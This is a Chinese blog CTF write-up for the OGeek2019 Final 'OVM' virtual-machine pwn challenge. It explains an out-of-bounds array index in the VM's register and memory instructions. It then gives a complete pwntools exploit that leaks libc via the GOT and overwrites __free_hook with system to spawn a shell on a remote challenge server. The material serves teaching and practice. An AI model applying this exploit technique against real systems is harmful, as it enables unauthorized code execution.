[OGeek2019 Final]OVM(简易虚拟机逃逸)

最新推荐文章于 2023-08-06 21:43:46 发布
最新推荐文章于 2023-08-06 21:43:46 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105862737
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

[OGeek2019 Final]OVM

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,是一个虚拟机

其中,这里这条mov reg的指令比较重要

还有这里mov memory的指令也比较重要

这里两处,都存在下标越界,通过查看汇编指令可知,memory和reg都是有符号的数据数组。

因此,利用reg[out] = memory[-X],可以向上越界,将数据存储在reg[out]里。向上越界,可以读取got表,进而可以获得glibc函数地址。同理,memory[-X] = reg[op],可以实现任意地址写。我们可以利用虚拟机指令,将comment篡改为free_hook的地址,然后,虚拟机指令执行完以后

这里会有一个对comment进行编辑的操作

编辑结束后会调用free

因此,我们将comment修改为free_hook,然后编辑的时候编辑为system或one_gadget的地址。

#coding:utf8
from pwn import *

#sh = process('./ovm')
sh = remote('node3.buuoj.cn',25335)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
exit_sym = libc.sym['exit']
free_hook_sym = libc.symbols['__free_hook']
opcode = []

def mov_reg(reg,data):
   #===================通过运算,使得reg[0]为指定值=============
   #reg[i] = (data & 0xFF000000) >> 24
   opcode.append(u32( (p8(0x10) + p8(reg) + p8(0) + p8((data & 0xFF000000) >> 24))[::-1]))
   #reg[11] = 24
   opcode.append(u32( (p8(0x10) + p8(11) + p8(0) + p8(24))[::-1]))
   #reg[12] = reg[i] << 24
   opcode.append(u32( (p8(0xC0) + p8(12) + p8(reg) + p8(11))[::-1]))
   #reg[i] = (data & 0xFF000000) >> 16
   opcode.append(u32( (p8(0x10) + p8(reg) + p8(0) + p8((data & 0xFF0000) >> 16))[::-1]))
   #reg[11] = 16
   opcode.append(u32( (p8(0x10) + p8(11) + p8(0) + p8(16))[::-1]))
   #reg[13] = reg[i] << 16
   opcode.append(u32( (p8(0xC0) + p8(13) + p8(reg) + p8(11))[::-1]))
   #reg[12] = reg[12] | reg[13]
   opcode.append(u32( (p8(0xA0) + p8(12) + p8(12) + p8(13))[::-1]))
   #reg[i] = (data & 0xFF00) >> 8
   opcode.append(u32( (p8(0x10) + p8(reg) + p8(0) + p8((data & 0xFF00) >> 8))[::-1]))
   #reg[11] = 8
   opcode.append(u32( (p8(0x10) + p8(11) + p8(0) + p8(8))[::-1]))
   #reg[13] = reg[i] << 8
   opcode.append(u32( (p8(0xC0) + p8(13) + p8(reg) + p8(11))[::-1]))
   #reg[12] = reg[12] | reg[13]
   opcode.append(u32( (p8(0xA0) + p8(12) + p8(12) + p8(13))[::-1]))
   #reg[i] = data & 0xFF
   opcode.append(u32( (p8(0x10) + p8(reg) + p8(0) + p8(data & 0xFF))[::-1]))
   #reg[i] |= reg[12]
   opcode.append(u32( (p8(0xA0) + p8(reg) + p8(reg) + p8(12))[::-1]))
#=======================================================================
def mov_mem_reg(reg1,reg2):
   #memory[reg1] = reg2
   opcode.append(u32( (p8(0x40) + p8(reg2) + p8(0) + p8(reg1))[::-1]))

def mov_reg_mem(reg1,reg2):
   opcode.append(u32( (p8(0x30) + p8(reg1) + p8(0) + p8(reg2))[::-1]))

def add_reg(reg1,reg2):
   opcode.append(u32( (p8(0x70) + p8(reg1) + p8(reg1) + p8(reg2))[::-1]))

def print_reg():
   opcode.append(u32( (p8(0) + p8(0) + p8(0) + p8(0xFF))[::-1]))

######将comment指向free_hook##############
#reg[0] = -0x20
mov_reg(0,0xFFFFFFE0)
#reg[1] = -8
mov_reg(1,0xFFFFFFF8)
#reg[2] = free_hook_sym - exit_sym - 0x8
mov_reg(2,free_hook_sym - exit_sym - 0x8)
#将exit的got内容取4字节存入reg[0]
mov_reg_mem(0,0)
#加上偏移,即变成了free_hook-0x8的地址低4字节
add_reg(0,2)
#在memory[-0x8]处写上reg[0]的内容
mov_mem_reg(1,0)
#reg[0] = -0x1F
mov_reg(0,0xFFFFFFE1)
#reg[1] = -7
mov_reg(1,0xFFFFFFF9)
#将exit的got+4内容取4字节存入reg[0]
mov_reg_mem(0,0)
#在memory[-0x7]处写上reg[0]的内容
mov_mem_reg(1,0)

##########泄露exit的got表
#reg[1] = -0x20
mov_reg(1,0xFFFFFFE0)
#将exit的got内容取4字节存入reg[1]
mov_reg_mem(1,1)
print_reg()


sh.sendlineafter('PC:','100')
sh.sendlineafter('SP','0')
sh.sendlineafter('CODE SIZE:',str(len(opcode)))
sh.recvuntil('CODE')
for o in opcode:
   sh.sendline(str(o))

sh.recvuntil('R0: ')
high = int(sh.recvuntil('\n',drop = True),16)
sh.recvuntil('R1: ')
low = int(sh.recvuntil('\n',drop = True),16)
exit_addr = (high << 32) + low
libc_base = exit_addr - exit_sym
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#修改free_hook,然后后面会触发,getshell
sh.sendafter('HOW DO YOU FEEL AT OVM?','/bin/sh\x00' + p64(system_addr))

sh.interactive()

 

ha1vk
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OGeek_2019_Final OVM题解
lifanxin的博客
05-24 757
WP程序分析程序主逻辑分析虚拟机指令分析利用思路exp总结 程序分析   本题目是一道典型的虚拟机题目,通过这道题目,我们可以学习一下VM pwn题的分析技巧和利用思路。   该题目程序和远程环境可以在buuoj上找到,下面老规矩先检查下程序信息,64位小端程序,没有开启栈保护。   做虚拟机pwn题,我们可以分两大步骤进行,首先先分析一下这个程序是如何实现虚拟机功能的,也就是程序自身的大逻辑,然后我们再详细分析程序虚拟出来的指令,分析指令的过程可能会比较耗时,需要耐心。 程序主逻辑分析   我们首先来
[OGeek2019 Final]OVM
weixin_52878095的博客
03-19 3870
静态分析 拿到题目后第一件事先检查程序的保护机制 看到程序除了canary保护以为,其他保护都开了,丢到IDA里面静态分析,程序先是为comment参数分配了一块0x8c大小的内存,然后让我们输入指令起始位置和栈起始位置,然后将指令起始位置赋值给reg[13],将栈起始位置赋值给reg[15],而且指令的数量不能大于0x10000,然后就是需要我们一条一条输入指令,输入完毕后就读取指令并执行,最后会有一个向comment中写入数据然后调用sendcomment函数 然后我们分别看一下fetch() /
[OGeek2019 Final]OVM简易虚拟机逃逸
m0_51251108的博客
10-16 737
vmpwn入门
[OGeek2019 Final]OVM——详细入门VM pwn
最新发布
fzucaicai的博客
08-06 938
仔细分析代码都可以发现,这些操作都没有对数组的下标进行检查,这样会导致什么后果呢,举个例子,如果有一个重要数据B存在数组array[10]的内存前面,如果不对数组的下标进行检查的话,那么我就可以构造array[-1]并输出,就可以得到B的内容了。也就是说,我们给程序输入一串指令,这个程序会有自己独特的,对代码的理解,并进行像分解成机器码那样,执行,而像寄存器,栈空间,存储空间都是程序自己设计的,而不是系统分配的。这两个条件判断语句的目的是确保在进行内存释放操作之前,所提供的指针和大小都是有效的。
OVM-V1.1版已正式发布,新增虚拟机快照、备份等功能!
weixin_33875839的博客
09-20 186
为什么80%的码农都做不了架构师?>>> ...
Oracle OVM虚拟机软件及管理介绍
10-16
### Oracle OVM虚拟机软件及管理介绍 #### 一、基础架构虚拟化技术综述 随着云计算技术的快速发展,虚拟化成为了实现云服务的关键技术之一。Oracle Virtual Machine (OVM) 作为Oracle提供的企业级虚拟化解决方案,...
ovm7690.rar_OVm7690
09-23
OVm7690是一款专门用于视频追踪的设备,它结合了先进的图像处理技术和智能算法,为用户提供高效、精准的视频监控解决方案。该设备的核心功能是通过对视频流的实时分析,实现目标检测、跟踪和识别,广泛应用于安全...
ovm_register-1.0beta7.tar.gz_ovm
09-22
标题中的"ovm_register-1.0beta7.tar.gz_ovm"表明我们正在处理一个与OVM(Open Verification Methodology)相关的软件包,版本为1.0 beta7,且已压缩为tar.gz格式。这种格式常见于Linux和Unix系统中,用于归档和压缩...
ovm_idm.zip_IDM 和 OVM_OVM模型_courttw9_eastacd_iDM模型
07-14
在车辆动力学领域,IDM (Intelligent Driver Model) 和 OVM (Optimal Velocity Model) 是两种广泛应用的交通流模拟模型。这两个模型都是为了理解和预测驾驶员的行为,从而更好地模拟和控制交通流。在这个名为 "ovm_...
[HFCTF2020]JustEscape vm沙箱逃逸
scrawman的博客
11-29 612
[HFCTF2020]JustEscape 先用Error().stack测试一下,确定是vm.js 这个老哥写的沙箱逃逸https://github.com/patriksimek/vm2/issues/225 "use strict"; const {VM} = require('vm2'); const untrusted = '(' + function(){ TypeError.prototype.get_process = f=>f.constructor("return proces
CTF pwn题之虚拟机题型详解
lifanxin的博客
05-24 1484
虚拟机题型详解概述如何分析一个例子总结 概述   随着对pwn题的学习,慢慢开始接触VM虚拟机pwn题了,刚开始做这种类型的题时会发现代码量比较大,略显复杂,复杂的部分主要是在用程序实现虚拟机指令那里。   其实这种题做法和普通pwn类似,也是寻找漏洞,复杂的地方在于需要我们去分析出虚拟机实现的指令,然后用这些指令操作进行漏洞利用。 如何分析   接下来介绍下如何分析,对于VM类型的pwn题,复杂的地方在于分析出该VM对应实现的指令,那么如何分析需要一定章法。这里需要简单知晓一些计算机组成原理和汇编语言的
VM pwn入门
weixin_44145820的博客
06-07 2059
VM pwn貌似是最近火起来的一类PWN题。最近打的好几场比赛都出现了VM pwn的题目,正好在BUU上面遇到一道2019年的OGeek中出现的VM pwn题,感觉应该会比较简单,另外听说高校战役里的EasyVM也是偏简单的VM pwn题。本文就主要对这两道题目进行分析。 [OGeek2019 Final]OVM 程序分析 作为VM pwn的第一步就是需要搞清楚指令的格式,操作码和操作数 本题使用的是定长指令,一共32bits,每一个占8bits,但除了操作码能利用完8bits之外,寄存器只占4bits,
VMPWN
Amalllの博客
11-11 1033
1.虚拟机保护技术 所谓虚拟机保护技术,是指将代码翻译为机器和人都无法识别的一串伪代码字节流;在具体执行时再对这些伪代码进行一一翻译解释,逐步还原为原始代码并执行。这段用于翻译伪代码并负责具体执行的子程序就叫作虚拟机VM(好似一个抽象的CPU)。它以一个函数的形式存在,函数的参数就是字节码的内存地址。 2.VStartVM 虚拟机的入口函数,对虚拟机环境进行初始化 3.VMDispather 解释opcode,并选择对应的Handler函数执行,当Handler执行完后会跳回这里,形成一个循环
【八芒星计划】 VM PWN
carol2358的博客
09-01 482
这篇用来记录VM PWN 先申明本篇文章资料来源: https://blog.csdn.net/weixin_44145820/article/details/106600382 https://www.anquanke.com/post/id/208450#h2-1 https://xz.aliyun.com/t/6865 文章目录[OGeek2019 Final]OVM vm pwn最关键的就是逆向相关程序,理解每个指令的作用,漏洞大多数都是数组越界 先介绍一些基础的概念: 1.虚拟机保护技术 所谓
buuoj Pwn writeup 166-170
yongbaoii的博客
06-03 248
166 picoctf_2018_echo back 167 168 169 170
一道题目入门VMpwn
qq_40712959的博客
04-16 328
一道题目学习VMpwn 原理 VMpwn 程序通常都是模拟一套虚拟机,对用户输入的opcode进行解析,模拟程序的执行,故VMpwn常见设计如下: 初始化分配模拟寄存器空间(reg) 初始化分配模拟栈空间(stack) 初始化分配模拟数据存储空间(data) 初始化分配模拟机器指令(opcode)空间(text) [OGeek2019 Final]OVM 程序采用32bit定长指令,每个操作码、操作数均为8bit,其格式为: | opcode | dst | op1 | op2 | 程序具体指令参考
BUUCTF [OGeek2019]babyrop
、moddemod
06-09 648
exp from pwn import * from LibcSearcher import * context.log_level = 'debug' p = process('./pwn7') elf = ELF('./pwn7') payload = '\0'.encode().ljust(0x10, bytes([0xff])) p.sendline(payload) p.recvuntil('Correct\n') write_plt = elf.plt['write'] write_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值